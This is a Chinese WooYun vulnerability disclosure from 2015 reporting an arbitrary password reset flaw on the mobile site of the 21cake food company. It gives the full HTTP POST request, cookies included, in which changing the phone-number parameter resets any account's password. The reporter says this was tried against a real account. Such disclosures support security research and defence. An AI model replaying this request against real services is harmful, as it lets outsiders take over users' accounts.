漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0136921
漏洞标题:廿一客分站任意密码重置
相关厂商:廿一客食品有限公司
漏洞作者: Vinc
提交时间:2015-08-25 21:13
修复时间:2015-08-30 21:14
公开时间:2015-08-30 21:14
漏洞类型:设计缺陷/逻辑错误
危害等级:高
自评Rank:15
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-08-25: 细节已通知厂商并且等待厂商处理中
2015-08-30: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
:)
详细说明:
域名:
m.21cake.com
重置密码的操作最后一步,POST的内容如下:
=0&mobile=13888888888&pam_account%5Blogin_password%5D=123456&pam_account%5Bpsw_confirm%5D=123456
修改13888888888即可重置任意手机密码
POST包内容如下:
POST /passport-resetpasswordbymob.html HTTP/1.1
Host: m.21cake.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://m.21cake.com/passport-resetmob_code1.html
Content-Length: 96
Cookie: sale_city=%257B%2522id%2522%253A%25222%2522%252C%2522name%2522%253A%2522%25E5%258C%2597%25E4%25BA%25AC%2522%252C%2522region_id%2522%253A2%252C%2522first%2522%253A%2522ok%2522%257D; Hm_lvt_c4f4185f92223489c0fd9389a449ae9c=1440501806; Hm_lpvt_c4f4185f92223489c0fd9389a449ae9c=1440501826; OZ_1U_2141=vid=v5dc502ea6ad32.0&ctime=1440501826<ime=1440501805; OZ_1Y_2141=erefer=-&eurl=http%3A//www.21cake.com/&etime=1440501805&ctime=1440501826<ime=1440501805&compid=2141; __utma=24451449.1272394634.1440501806.1440501806.1440501806.1; __utmb=24451449.2.10.1440501806; __utmc=24451449; __utmz=24451449.1440501806.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; _jzqa=1.1585776530674180400.1440501806.1440501806.1440501806.1; _jzqb=1.2.10.1440501806.1; _jzqc=1; _jzqckmp=1; __xsptplus90=90.1.1440501805.1440501826.2%234%7C%7C%7C%7C%7C%23%23UCBLMkCNnjk-NRBM-AHGRfgDLj-fvBo7%23; vary=0eb5f3136d657c41f04381bca2046b6038cb5798ddcaefc69a15378790489414; SERVERID=c663ce0bc049a06b6eda9565bb1a3436|1440502073|1440501861; Hm_lvt_ea7ddf915b0403f14eb1517f294548a8=1440501862; Hm_lpvt_ea7ddf915b0403f14eb1517f294548a8=1440502072; __utma=76726601.758850462.1440501862.1440501862.1440501862.1; __utmb=76726601.12.10.1440501862; __utmc=76726601; __utmz=76726601.1440501862.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); OZ_1U_2167=vid=v5dc506696442a.0&ctime=1440502072<ime=1440502057; OZ_1Y_2167=erefer=-&eurl=http%3A//m.21cake.com/&etime=1440501862&ctime=1440502072<ime=1440502057&compid=2167; s=6ad724bc7f7560ed9bad9cab98649157; S[CART_NUMBER]=0; S[CART_COUNT]=0; S[CART_TOTAL_PRICE]=%EF%BF%A50.00
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
=0&mobile=13888888888&pam_account%5Blogin_password%5D=123456&pam_account%5Bpsw_confirm%5D=123456
漏洞证明:
登录13888888888的账户证明下,
通过上述步骤将密码重置为123456,登录:
修复方案:
:)
版权声明:转载请注明来源 Vinc@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-08-30 21:14
厂商回复:
漏洞Rank:4 (WooYun评价)
最新状态:
暂无